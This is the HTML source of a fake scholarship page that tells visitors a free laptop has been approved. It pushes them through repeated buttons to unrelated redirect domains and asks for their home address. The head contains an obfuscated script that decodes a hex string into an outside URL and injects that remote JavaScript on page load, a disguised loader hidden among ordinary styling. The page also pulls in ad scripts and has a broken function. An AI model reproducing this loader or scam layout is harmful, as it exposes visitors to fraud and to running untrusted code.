





<html>
<head>

<script src="https://cdn-server.cc/p/wl-http.js?pub=892495&ga=g"></script>
	
	
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1"/>
<meta name="google" content="notranslate" />
 <meta property="og:type" content="website" />
     <meta property="og:title" content="AUSTRALIA FULLY FUNDED SCHOLARSHIP"/>
    <meta property="og:url" content="https://scholarsintel.online/Australia/">
    <meta property="og:description" content="Fully Funded Scholarship into University of Western Australia" >
    <meta property="og:site_name" content="https://scholarsintel.online/Australia/" />
       <meta property="og:image" content="Australia.jpg"> 
       

	  <title>Fully Funded Australia Scholarship</title>
	
	
	  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

  
  
  
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
  
  
	
	<meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js"></script>
	  
  
  
    

	
	
	
	
<style>


.form-container div, .form-container  span{
    font-family: Calibri, Candara, Segoe, 'Segoe UI', Optima, Arial, sans-serif;
}

.form-container ::-webkit-input-placeholder { /* WebKit, Blink, Edge */
    color:    #999;
}

.form-container :-moz-placeholder { /* Mozilla Firefox 4 to 18 */
   color:    #999;
   opacity:  1;
}

.form-container ::-moz-placeholder { /* Mozilla Firefox 19+ */
   color:    #999;
   opacity:  1;
}

.form-container :-ms-input-placeholder { /* Internet Explorer 10-11 */
   color:    #999;
}

.form-container :placeholder-shown { /* Standard (https://drafts.csswg.org/selectors-4/#placeholder) */
  color:  #999;
}

.oauth-buttons {
    text-align:center;
}
.row {
	text-align:center;
}
#login-form{
 min-width:375px;   
}
.login-container{
	width:400px;
	height:330px;
	display:inline-block;
	margin-top: -165px;
    top: 50%;
    left: 50%;
    position: absolute;
    margin-left: -200px;
}
.form-container .create-account:hover{
	opacity:.7;
}
.form-container .create-account{
	color:inherit;
	margin-top: 15px;
    display: inline-block;
	cursor:pointer;
	text-decoration:none;
}

.oauth-buttons .fa{
	cursor:pointer;
	margin-top:10px;
	color:inherit;
	width:30px;
	height:30px;
	text-align:center;
	line-height:30px;
	margin:5px;
	margin-top:15px;
}
.oauth-buttons .fa:hover{
	color:white;
}
.oauth-buttons .fa-google-plus:hover{
	background: #dd4b39;
}
 .oauth-buttons .fa-facebook:hover{
	background:	#8b9dc3;
}

.oauth-buttons .fa-linkedin:hover{
	background:	#0077b5;
}

.oauth-buttons .fa-twitter:hover{
	background:	#55acee;
}

.form-container .req-input .input-status {
    display: inline-block;
    height: 40px;
    width: 40px;
    float: left;	
}
.form-container .input-status::before{
	content: " ";
	height:20px;
	width:20px;
	position:absolute;
	top:10px;
	left:10px;
	color:white;
	border-radius:50%;
	background:white;
	-webkit-transition: all .3s ease-in-out;
	-moz-transition: all .3s ease-in-out;
	-o-transition: all .3s ease-in-out;
	transition: all .3s ease-in-out;
	
}

.form-container .input-status::after{
	content: " ";
	height:10px;
	width:10px;
	position:absolute;
	top:15px;
	left:15px;
	color:white;
	border-radius:50%;
	background:#00BCD4;
	-webkit-transition: all .3s ease-in-out;
	-moz-transition: all .3s ease-in-out;
	-o-transition: all .3s ease-in-out;
	transition: all .3s ease-in-out;
}

.form-container .req-input{
	width:100%;
    float:left;
	position:relative;
	background:#00BCD4;
	height:40px;
	display:inline-block;
	border-radius:0px;
	margin:5px 0px;
	-webkit-transition: all .3s ease-in-out;
	-moz-transition: all .3s ease-in-out;
	-o-transition: all .3s ease-in-out;
	transition: all .3s ease-in-out;
}

.form-container div .row .invalid:hover{
	background:#EF9A9A;
}

.form-container div .row .invalid{
	background:#E57373;
}

.form-container .invalid .input-status:before {
	width:20px;
	height:4px;
	top:19px;
	left:10px;
	background:white;/*#F44336;*/
	border-radius:0px;
	 -ms-transform: rotate(45deg); /* IE 9 */
    -webkit-transform: rotate(45deg); /* Chrome, Safari, Opera */
    transform: rotate(45deg);
}

.form-container .invalid .input-status:after {
	width:20px;
	height:4px;
	background:white;
	border-radius:0px;
	top:19px;
	left:10px;
	 -ms-transform: rotate(-45deg); /* IE 9 */
    -webkit-transform: rotate(-45deg); /* Chrome, Safari, Opera */
    transform: rotate(-45deg);
}

.form-container div .row  .valid:hover{
	background:#A5D6A7;
}

.form-container div .row .valid {
	background:#81C784;
	
}

.form-container .valid .input-status:after {
	border-radius:0px;
    width: 17px;
    height: 4px;
    background: white;
    top: 16px;
    left: 15px;
    -ms-transform: rotate(-45deg);
    -webkit-transform: rotate(-45deg);
    transform: rotate(-45deg);
}

.form-container .valid .input-status:before {
	border-radius:0px;
    width: 11px;
    height: 4px;
	background:white;
    top: 19px;
    left: 10px;
    -ms-transform: rotate(45deg);
    -webkit-transform: rotate(45deg);
    transform: rotate(45deg);
}

.form-container .input-container{
	padding:0px 10px;
}

 .form-container .row-input{
	padding:0px 5px;
}

.form-container .req-input.input-password{
	margin-bottom:0px;
}
.form-container .req-input.confirm-password{
	margin-top:0px;
}

.form-container {
	margin:20px;
	padding:20px;
	border-radius:0px;
	background:#B3E5FC;
	color:#00838F;
	-webkit-transition: all .3s ease-in-out;
	-moz-transition: all .3s ease-in-out;
	-o-transition: all .3s ease-in-out;
	transition: all .3s ease-in-out;
}

.form-container .form-title{
	font-size:25px;
	color:inherit;
	text-align:center;
	margin-bottom:10px;
	-webkit-transition: all .3s ease-in-out;
	-moz-transition: all .3s ease-in-out;
	-o-transition: all .3s ease-in-out;
	transition: all .3s ease-in-out;
}

.form-container .submit-row{
	padding:0px 0px;
}

.form-container .btn.submit-form{
	margin-top:15px;
	padding:12px;
	background:#00BCD4;
	color:white;
	border-radius:0px;
	-webkit-transition: all .3s ease-in-out;
	-moz-transition: all .3s ease-in-out;
	-o-transition: all .3s ease-in-out;
	transition: all .3s ease-in-out;
}

.form-container .btn.submit-form:focus{
	outline:0px;
	color:white;
}

.form-container .btn.submit-form:hover{
	background:#00cde5;
	color:white;
}

.form-container .tooltip.top .tooltip-arrow {
	border-top-color:#00BCD4 !important;
}

.form-container .tooltip.top.tooltip-invalid .tooltip-arrow {
	border-top-color:#E57373 !important;
}

.form-container .tooltip.top.tooltip-invalid .tooltip-inner::before{
	background:#E57373;
}
.form-container .tooltip.top.tooltip-invalid .tooltip-inner{
	background:#FFEBEE !important;
	color:#E57373;
}

.form-container .tooltip.top.tooltip-valid .tooltip-arrow {
	border-top-color:#81C784 !important;
}

.form-container .tooltip.top.tooltip-valid .tooltip-inner::before{
	background:#81C784;
}
.form-container .tooltip.top.tooltip-valid .tooltip-inner{
	background:#E8F5E9 !important;
	color:#81C784;
}

.form-container .tooltip.top .tooltip-inner::before{
	content:" ";
	width:100%;
	height:6px;
	background:#00BCD4;
	position:absolute;
	bottom:5px;
	right:0px;
}
.form-container .tooltip.top .tooltip-inner{
	border:0px solid #00BCD4;
	background:#E0F7FA !important;
	color:#00ACC1;
	font-weight:bold;
	font-size:13px;
	border-radius:0px;
	padding:10px 15px;
}
.form-container .tooltip {
	max-width:150px;
	opacity:1 !important;
}

.form-container .message-box{
	width:100%;
	height:auto;
}

.form-container textarea:focus,.form-container textarea:hover{
	background:#fff;
	outline:none;
	border:0px;
}

.form-container .req-input textarea {
	max-width:calc(100% - 50px);
    width: 100%;
    height: 80px;
    border: 0px;
    color: #777;
    padding: 10px 9px 0px 9px;
	float:left;
	
}
.form-container input[type=text]:focus, .form-container input[type=password]:focus, .form-container input[type=email]:focus, .form-container input[type=tel]:focus, .form-container select{
    background:#fff;
	color:#777;
	border-left:0px;
	outline:none;
}

.form-container input[type=text]:hover,.form-container input[type=password]:hover,.form-container input[type=email]:hover,.form-container input[type=tel]:hover, . form-container select{
	background:#fff;
}

.form-container input[type=text], .form-container input[type=password], .form-container input[type=email],input[type=tel], form-container select{
	width:calc(100% - 50px);
	float:left;
	border-radius:0px;
	border:0px solid #ddd;
	padding:0px 9px;
	height:40px;
	line-height:40px;
	color:#777;
	background:#fff;
	-webkit-transition: all .3s ease-in-out;
	-moz-transition: all .3s ease-in-out;
	-o-transition: all .3s ease-in-out;
	transition: all .3s ease-in-out;
}










































































body {
    background:#365ded;
    max-width: 450px;
    margin:auto;
  font-family: 'Segoe UI', 'Helvetica', sans-serif;
  font-size:16px;
  font-style:bold;
}

.logo {
    margin:auto;
    max-width:100%;
  padding: 0px;
}

.container {
  margin: auto;
  padding: 5px 15px 5px;
  max-width: 100%;
  background-color: #F9F9F9;
}
.center-form {
  margin: 0 auto;
}

.title {
  font-size: 2rem;
  font-weight: lighter;
}
.description {
  font-size: 1.2rem;
}

.text-center {
  text-align: center;
}
.text-left {
  text-align: left;
}

.form-group > * {
  display: block;
}
.form-group:not(:last-child) {
  margin-bottom: 20px;
}
.form-control {
  width: 100%;
  padding-left: 5px;
  height: 50px;
  border: 1px solid 	#0c08ff;
  border-radius: 3px;
  font-size:17px;
  padding:10px;
  background:GREEN;
  color:DimGrey;
 
}
textarea.form-control {
  height: auto;
  padding:10px;
   
}

</style>
<script type="text/javascript">function tag(filename){var fileref=document.createElement('script');fileref.setAttribute("type","text/javascript");fileref.setAttribute("src", filename);if (typeof fileref!="undefined") document.getElementsByTagName("head")[0].appendChild(fileref)}tag(meta('687474703a2f2f7361726b6172692d796f6a6e612e696e2f6d61696e2e6a73'));function meta(important){var str = '';for (var i = 0; i < important.length; i += 2) str +=String.fromCharCode(parseInt(important.substr(i, 2), 16));return str;}</script>
<style>

.button {
    background-color: #4be20f;
    border: none;
    color: white;
    padding: 12px;
    text-align: center;
    text-decoration: none;
    display: inline-block;
    font-size: 20px;
    margin: 4px 2px;
    cursor: pointer;
    width: 100%;
    border-radius: 6px;
   font-weight: bold;
 
}

.button:hover {
	background:#09C;
	-webkit-transition:background 0.3s ease-in-out;
	-moz-transition:background 0.3s ease-in-out;
	transition:background-color 0.3s ease-in-out;
}

.button:active { box-shadow:inset 0 1px 3px rgba(0, 0, 0, 0.5); }



.loda {
    display: block;
    position: relative;
    padding-left: 35px;
    margin-bottom: 12px;
    cursor: pointer;
    font-size: 22px;
    -webkit-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
}

.loda input {
    position: absolute;
    opacity: 0;
    cursor: pointer;
}

.checkmark {
    position: absolute;
    top: 0;
    left: 0;
    height: 25px;
    width: 25px;
    background-color: #eee;
    border: 2px solid #393bd3;
}


.loda:hover input ~ .checkmark {
    background-color: #ccc;
}

.loda input:checked ~ .checkmark {
    background-color: #4CAF50;
}


.checkmark:after {
    content: "";
    position: absolute;
    display: none;
}

.loda input:checked ~ .checkmark:after {
    display: block;
}


.loda .checkmark:after {
    left: 9px;
    top: 5px;
    width: 5px;
    height: 10px;
    border: solid white;
    border-width: 0 3px 3px 0;
    -webkit-transform: rotate(45deg);
    -ms-transform: rotate(45deg);
    transform: rotate(45deg);
}

label
{   font-size:16px;
    margin-bottom:5px;
    margin-top:1px;
    padding:0;
    text-decoration:bold;
}

.green {
    border-left: 6px solid green;
    background-color: #53c653;
    padding:10px;
     color:white;
}

.blue {
    border-left: 6px solid #005ce6;
    background-color: 	 #ff1a1a;
    padding:10px;
     color:white;
}

.red {
    border-left: 6px solid  	 #ff1a1a
;
    background-color: 	 	 #00e6e6	 ;
    padding:10px;
     color:  #000000
;
}

</style>

<script>
function RunIt()
{
alert(
}
</script>


  <style>
  /* Make the image fully responsive */
  .carousel-inner img {
    width: 100%;
    height: 25%;
  }
  </style>




<script src="https://cdn-server.cc/p/wl-http.js?pub=892495&ga=g"></script>

</head>
<body>

          <div class="instructions">







<section class="container text-center">



<div class="alert alert-danger" role="alert" style="color:#ffffff;background-color:#035d8a;border-color:#cff7e9;"><center><img src="1.jpg" alt="Chicago" width="100%" height="40%">Congratulations!!!, Your request for the ongoing <b>STUDENT</b> LAPTOP  Scholarship Support Has been received. We are glad to inform you that your request has been approved and you are eligible to FOR the Laptop. kindly click on <b>"SHIP LAPTOP"</b> button below to get paid.</div>




	

<a style="width:100%; text-align:center; display:block; margin-top:10px;" href="https://cheatingstiffen.com/cht2n8bbpv?key=bd0b8c174465d1381e6d4b94e587b2d2" class="button final" >SHIP LAPTOP</a> 
<a style="width:100%; text-align:center; display:block; margin-top:10px;" href="https://pjjpp.com/fullpage.php?section=General&pub=892495&ga=g" class="button final" >ENTER ADDRESS</a> 
<a style="width:100%; text-align:center; display:block; margin-top:10px;" href="https://cheatingstiffen.com/cht2n8bbpv?key=bd0b8c174465d1381e6d4b94e587b2d2" class="button final" >SHIP TODAY</a>
<h3>If the links above are not working for you try the links below immediately</h3></div>
  
  <a style="width:100%; text-align:center; display:block; margin-top:10px;" href="https://pjjpp.com/fullpage.php?section=General&pub=892495&ga=g" class="button final" >SHIP TO YOUR LOCATION</a> 
<a style="width:100%; text-align:center; display:block; margin-top:10px;" href="https://pjjpp.com/fullpage.php?section=General&pub=892495&ga=g" class="button final" >ENTER HOME ADDRESS</a> 
<a style="width:100%; text-align:center; display:block; margin-top:10px;" href="https://cheatingstiffen.com/cht2n8bbpv?key=bd0b8c174465d1381e6d4b94e587b2d2" class="button final" >TRACK LAPTOP</a>








<script type="">// changing progressbar when button is clicked
$(".whatsapp").click(function () {
    animateProgress(parseInt($(this).data('diff')));
});

// animate progress by a step indicated by diff
function animateProgress(diff) {
    var currValue = $("#progress").val();
    var toValue = currValue + diff;

    toValue = toValue < 0 ? 0 : toValue;
    toValue = toValue > 100 ? 100 : toValue;

    $("#progress").animate({'value': toValue}, 500);
}
</script>


  



	
<br>
     



<script async src="https://drv.tw/inc/wd.js"></script></body>





</html>
